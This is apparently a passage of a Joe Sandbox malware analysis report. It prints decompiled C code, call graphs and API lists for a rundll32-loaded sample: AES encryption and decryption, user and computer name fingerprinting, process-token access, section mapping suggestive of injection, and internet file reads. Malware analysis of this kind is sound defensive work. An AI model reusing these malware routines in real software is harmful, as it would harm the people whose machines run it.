                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480438
                                • SetEvent.KERNEL32(?,0348C384,00000000,00000000,?,?,?,?,?,?,?,03479100,?), ref: 034804CE
                                • RtlAllocateHeap.NTDLL(00000000,00000043,0348C384), ref: 034804E3
                                • wsprintfA.USER32 ref: 03480513
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                • String ID:
                                • API String ID: 3929413950-0
                                • Opcode ID: 6c01189554e135ea776792e160ff53fa80dd9c3ba1cabf5d71810be44198e6c7
                                • Instruction ID: ae11f052e228140bb2d6ef3f0d775e787ef2f42209261aab41e2a7de75cf1249
                                • Opcode Fuzzy Hash: 6c01189554e135ea776792e160ff53fa80dd9c3ba1cabf5d71810be44198e6c7
                                • Instruction Fuzzy Hash: D7C18DB0510348AFCB20FF65E88992F7BE8FB99700B19485FE546EF204C7759849CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03435FBB Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 189 3435fbb-3435ffb CryptAcquireContextW 190 3436152-3436158 GetLastError 189->190 191 3436001-343603d memcpy CryptImportKey 189->191 192 343615b-3436162 190->192 193 3436043-3436055 CryptSetKeyParam 191->193 194 343613d-3436143 GetLastError 191->194 195 343605b-3436064 193->195 196 3436129-343612f GetLastError 193->196 197 3436146-3436150 CryptReleaseContext 194->197 198 3436066-3436068 195->198 199 343606c-3436079 call 3436d63 195->199 200 3436132-343613b CryptDestroyKey 196->200 197->192 198->199 201 343606a 198->201 204 3436120-3436127 199->204 205 343607f-3436088 199->205 200->197 201->199 204->200 206 343608b-3436093 205->206 207 3436095 206->207 208 3436098-34360b5 memcpy 206->208 207->208 209 34360d0-34360df CryptDecrypt 208->209 210 34360b7-34360ce CryptEncrypt 208->210 211 34360e5-34360e7 209->211 210->211 212 34360f7-3436102 GetLastError 211->212 213 34360e9-34360f3 211->213 214 3436116-343611e call 3436c2c 212->214 215 3436104-3436114 212->215 213->206 216 34360f5 213->216 214->200 215->200 216->215
                                C-Code - Quality: 58%
                                			E03435FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x343a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x343a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E03436D63(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x343a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E03436C2C(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                0x03435fc4
                                0x03435fca
                                0x03435fcd
                                0x03435fd3
                                0x03435fd3
                                0x03435fd5
                                0x03435fd7
                                0x03435fda
                                0x03435fe0
                                0x03435fe1
                                0x03435fe2
                                0x03435fe8
                                0x03435fed
                                0x03435ff3
                                0x03435ffb
                                0x03436158
                                0x03436001
                                0x03436003
                                0x0343600c
                                0x03436011
                                0x03436023
                                0x03436026
                                0x0343602a
                                0x03436031
                                0x03436035
                                0x0343603d
                                0x03436143
                                0x03436043
                                0x03436043
                                0x03436047
                                0x03436048
                                0x0343604a
                                0x03436055
                                0x0343612f
                                0x0343605b
                                0x0343605b
                                0x0343605e
                                0x03436064
                                0x0343606a
                                0x0343606a
                                0x03436072
                                0x03436074
                                0x03436079
                                0x03436120
                                0x0343607f
                                0x03436085
                                0x03436088
                                0x0343608b
                                0x0343608d
                                0x0343608e
                                0x03436093
                                0x03436095
                                0x03436095
                                0x0343609f
                                0x034360a4
                                0x034360a7
                                0x034360aa
                                0x034360ac
                                0x034360b5
                                0x034360df
                                0x034360b7
                                0x034360c8
                                0x034360c8
                                0x034360e7
                                0x00000000
                                0x00000000
                                0x034360e9
                                0x034360ec
                                0x034360ef
                                0x034360f3
                                0x00000000
                                0x034360f5
                                0x03436104
                                0x0343610a
                                0x03436112
                                0x03436112
                                0x00000000
                                0x034360f3
                                0x034360f7
                                0x034360fd
                                0x03436102
                                0x03436119
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03436102
                                0x03436079
                                0x03436132
                                0x03436135
                                0x03436135
                                0x0343614a
                                0x0343614a
                                0x03436162

                                APIs
                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,034324D8,00000001,034358D7,00000000), ref: 03435FF3
                                • memcpy.NTDLL(034324D8,034358D7,00000010,?,?,?,034324D8,00000001,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740), ref: 0343600C
                                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 03436035
                                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0343604D
                                • memcpy.NTDLL(00000000,75BCC740,055E95B0,00000010), ref: 0343609F
                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055E95B0,00000020,?,?,00000010), ref: 034360C8
                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055E95B0,?,?,00000010), ref: 034360DF
                                • GetLastError.KERNEL32(?,?,00000010), ref: 034360F7
                                • GetLastError.KERNEL32 ref: 03436129
                                • CryptDestroyKey.ADVAPI32(00000000), ref: 03436135
                                • GetLastError.KERNEL32 ref: 0343613D
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0343614A
                                • GetLastError.KERNEL32(?,?,?,034324D8,00000001,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 03436152
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                • String ID:
                                • API String ID: 1967744295-0
                                • Opcode ID: a0a0a23c970f744b18d47cd2598f43aade2fae79e7e80214cda4c6a550294f94
                                • Instruction ID: f550908860d73f15ea76c4a6a8f8f1bc7d7e1388d1d7c733fd114ff8d85bab6f
                                • Opcode Fuzzy Hash: a0a0a23c970f744b18d47cd2598f43aade2fae79e7e80214cda4c6a550294f94
                                • Instruction Fuzzy Hash: 65513B71900209FFDF10DFA4D884AEEBBB9EB09240F05842AF955EB240D7758A14DB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03433365 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 353 3433365-3433379 354 3433383-3433395 call 3432119 353->354 355 343337b-3433380 353->355 358 3433397-34333a7 GetUserNameW 354->358 359 34333e9-34333f6 354->359 355->354 360 34333f8-343340f GetComputerNameW 358->360 361 34333a9-34333b9 RtlAllocateHeap 358->361 359->360 363 3433411-3433422 RtlAllocateHeap 360->363 364 343344d-3433471 360->364 361->360 362 34333bb-34333c8 GetUserNameW 361->362 365 34333ca-34333d6 call 343708d 362->365 366 34333d8-34333e7 HeapFree 362->366 363->364 367 3433424-343342d GetComputerNameW 363->367 365->366 366->360 369 343342f-343343b call 343708d 367->369 370 343343e-3433447 HeapFree 367->370 369->370 370->364
                                C-Code - Quality: 96%
                                			E03433365(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x343a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E03432119( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x343a344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x343a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E0343708D(_v8 + _v8, _t64);
							}
							HeapFree( *0x343a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x343a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0343708D(_v8 + _v8, _t64);
						}
						HeapFree( *0x343a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                0x03433365
                                0x0343336d
                                0x03433371
                                0x03433374
                                0x03433379
                                0x0343337b
                                0x03433380
                                0x03433380
                                0x03433386
                                0x03433388
                                0x03433395
                                0x034333f6
                                0x03433397
                                0x0343339c
                                0x034333a2
                                0x034333a7
                                0x034333b5
                                0x034333b9
                                0x034333c8
                                0x034333cf
                                0x034333d6
                                0x034333d6
                                0x034333e1
                                0x034333e1
                                0x034333b9
                                0x034333a7
                                0x034333f8
                                0x034333fe
                                0x03433408
                                0x0343340a
                                0x0343340f
                                0x0343341e
                                0x03433422
                                0x0343342d
                                0x03433434
                                0x0343343b
                                0x0343343b
                                0x03433447
                                0x03433447
                                0x03433422
                                0x03433452
                                0x03433454
                                0x03433457
                                0x03433459
                                0x0343345c
                                0x0343345f
                                0x03433469
                                0x0343346d
                                0x03433471

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 0343339C
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034333B3
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 034333C0
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034333E1
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 03433408
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0343341C
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 03433429
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03433447
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: 986e4268c31e67b6560b56410d220e9daa36d7aae7dd84856f9bfdfa73f43676
                                • Instruction ID: 98d96d930b0ad8ae171539771baaacb0b35cc9dd841b119248bd74f4468b112f
                                • Opcode Fuzzy Hash: 986e4268c31e67b6560b56410d220e9daa36d7aae7dd84856f9bfdfa73f43676
                                • Instruction Fuzzy Hash: F7319E76A00205EFDB10EFA9CC81BAEF7F9FF48200F64802AE454EB250DB70E9119B15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03478FEC Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 477 3478fec-3478ffe 478 3479000-3479006 477->478 479 3479008 477->479 480 347900e-3479022 call 3487ac9 478->480 479->480 483 3479024-3479032 StrRChrA 480->483 484 347905e-3479088 call 347c431 480->484 485 3479037 483->485 486 3479034-3479035 483->486 490 34790a6-34790ae 484->490 491 347908a-347908e 484->491 489 347903d-3479058 _strupr lstrlen call 3490ee0 485->489 486->489 489->484 494 34790b5-34790d3 CreateEventA 490->494 495 34790b0-34790b3 490->495 491->490 493 3479090-347909b 491->493 493->490 497 347909d-34790a4 493->497 499 3479107-347910d GetLastError 494->499 500 34790d5-34790dc call 3485e8d 494->500 498 3479113-347911a 495->498 497->490 497->497 502 347911c-3479123 RtlRemoveVectoredExceptionHandler 498->502 503 3479129-347912e 498->503 501 347910f-3479111 499->501 500->499 506 34790de-34790e5 500->506 501->498 501->503 502->503 507 34790e7-34790f3 RtlAddVectoredExceptionHandler 506->507 508 34790f8-34790fb call 34800dc 506->508 507->508 510 3479100-3479105 508->510 510->499 510->501
                                APIs
                                • StrRChrA.SHLWAPI(0616B5B0,00000000,0000005C,?,?,?), ref: 03479028
                                • _strupr.NTDLL ref: 0347903E
                                • lstrlen.KERNEL32(0616B5B0,?,?), ref: 03479046
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 034790C6
                                • RtlAddVectoredExceptionHandler.NTDLL(00000000,0349076B), ref: 034790ED
                                • GetLastError.KERNEL32(?,?,?,?), ref: 03479107
                                • RtlRemoveVectoredExceptionHandler.NTDLL(034B05B8), ref: 0347911D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                • String ID:
                                • API String ID: 2251957091-0
                                • Opcode ID: 0a844530b5272e14b0daad89c8c7d88e3d2c8466fbb9707af78669bed365b4f3
                                • Instruction ID: a81616718dba77d569b3c5f72148caf1bacf28ac940d0937a42977fb21536170
                                • Opcode Fuzzy Hash: 0a844530b5272e14b0daad89c8c7d88e3d2c8466fbb9707af78669bed365b4f3
                                • Instruction Fuzzy Hash: DB312F729102506FEB11FFB9EC899EFBBE8E715250B19056BE511FF244D73148418B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347C431 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0347C478
                                • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0347C48B
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0347C4A7
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0347C4C4
                                • memcpy.NTDLL(?,00000000,0000001C), ref: 0347C4D1
                                • NtClose.NTDLL(?), ref: 0347C4E3
                                • NtClose.NTDLL(?), ref: 0347C4ED
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 4be1cc93ac06094b97da2e9e161b80ba65ff97fd3d2baac1c00661e5ccbe209c
                                • Instruction ID: cd05d7880b419b00b5228db41363ee9b066ea0aed5fafaae0e4538ff4838f13f
                                • Opcode Fuzzy Hash: 4be1cc93ac06094b97da2e9e161b80ba65ff97fd3d2baac1c00661e5ccbe209c
                                • Instruction Fuzzy Hash: 7021D2B6900218BFDB01EFA5DC85AEEBFBDEF08B50F104066F905BA150D7719A459BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03434321 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E03434321(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E03436D63(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E03436C2C(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x0343432e
                                0x0343432f
                                0x03434330
                                0x03434331
                                0x03434332
                                0x03434336
                                0x0343433d
                                0x0343434c
                                0x0343434f
                                0x03434352
                                0x03434359
                                0x0343435c
                                0x0343435f
                                0x03434362
                                0x03434365
                                0x03434370
                                0x03434372
                                0x0343437b
                                0x03434383
                                0x03434385
                                0x03434397
                                0x034343a1
                                0x034343a5
                                0x034343b4
                                0x034343b8
                                0x034343c1
                                0x034343c9
                                0x034343c9
                                0x034343cb
                                0x034343cb
                                0x034343d3
                                0x034343d9
                                0x034343dd
                                0x034343dd
                                0x034343e8

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03434368
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 0343437B
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03434397
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 034343B4
                                • memcpy.NTDLL(?,00000000,0000001C), ref: 034343C1
                                • NtClose.NTDLL(?), ref: 034343D3
                                • NtClose.NTDLL(00000000), ref: 034343DD
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 51b12ad42b52bd0a6709a78e6144e87ff90a664e43b5648f344194d9a245e77e
                                • Instruction ID: c57761af442b694bfa7c693d9208b79dbc6ef18e5fcb03bdfafe389a1c002259
                                • Opcode Fuzzy Hash: 51b12ad42b52bd0a6709a78e6144e87ff90a664e43b5648f344194d9a245e77e
                                • Instruction Fuzzy Hash: A921F6B6900219BFDB01EF95CC84ADEBFBDEB09740F108016F901EB254D7B19A549BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03486DE0 Relevance: 9.2, APIs: 6, Instructions: 238nativeCOMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(?,?,?,0347C71A,?,?,?,?,?,0347C71A,?,?,00000000), ref: 03486F59
                                  • Part of subcall function 0347C4FB: GetModuleHandleA.KERNEL32(?,?,?,03487017,?,?,?,00000000), ref: 0347C539
                                  • Part of subcall function 0347C4FB: memcpy.NTDLL(?,0349A30C,00000018,?,?,?), ref: 0347C5B5
                                • memcpy.NTDLL(?,?,00000018,0347C71A,?,?,?,?,?,0347C71A,?,?,00000000), ref: 03486FA7
                                • memcpy.NTDLL(?,0348DD8F,00000800,?,?,?,00000000), ref: 0348702A
                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 03487068
                                • NtClose.NTDLL(00000000,?,00000000), ref: 0348708F
                                  • Part of subcall function 03488F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0347C71A,0347C71A,?,03486EFA,?,0347C71A,?,?,00000000), ref: 03488F87
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FA9
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FBF
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FD5
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FEB
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03489001
                                  • Part of subcall function 0348BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0347717E,00000000,00000000,0347717E,?,00000002,00000000,?,0347C71A,00000000,0347717E,000000FF,?), ref: 0348BEAE
                                  • Part of subcall function 03481CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0347C71A,?,?,00000000), ref: 03481D58
                                  • Part of subcall function 03481CE4: memcpy.NTDLL(?,?,?), ref: 03481DBF
                                • memset.NTDLL ref: 034870AA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                                • String ID:
                                • API String ID: 3674896251-0
                                • Opcode ID: a2129a2775ad035996ac8b45827cd9c37196d1e1a62806df3603e7197a7ea83a
                                • Instruction ID: e1f81be2fca2b1120a2e1229950dfae85ae1046c7e2b6bf44a6346fc2488280c
                                • Opcode Fuzzy Hash: a2129a2775ad035996ac8b45827cd9c37196d1e1a62806df3603e7197a7ea83a
                                • Instruction Fuzzy Hash: 9DA14B7590020AEFCB11EFA9C880AAEBBB4BF05304F14456AE911AF350D735EA44DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431CA5 Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E03431CA5(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				long _t47;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x343a174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E03436D63(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E03436E40( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E03436C2C(_v16);
										if(_t64 == 0) {
											_t47 = E034315CC(_v12, _t69); // executed
											_t64 = _t47;
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E03436E40( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E03434A85(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                                0x03431ca5
                                0x03431ca6
                                0x03431cac
                                0x03431cb7
                                0x03431cb7
                                0x03431cb9
                                0x03437395
                                0x0343739a
                                0x0343739c
                                0x034373b3
                                0x034373e4
                                0x034373e9
                                0x034374ac
                                0x034373ef
                                0x034373f6
                                0x034373fe
                                0x034374a9
                                0x03437404
                                0x03437409
                                0x0343740e
                                0x03437413
                                0x0343749b
                                0x03437419
                                0x03437419
                                0x0343741b
                                0x03437421
                                0x03437422
                                0x03437422
                                0x03437425
                                0x03437428
                                0x0343742e
                                0x0343743f
                                0x03437447
                                0x00000000
                                0x00000000
                                0x0343744f
                                0x03437457
                                0x03437463
                                0x03437467
                                0x03437469
                                0x0343746e
                                0x00000000
                                0x00000000
                                0x0343746e
                                0x03437467
                                0x03437480
                                0x03437483
                                0x0343748a
                                0x03437490
                                0x03437495
                                0x03437495
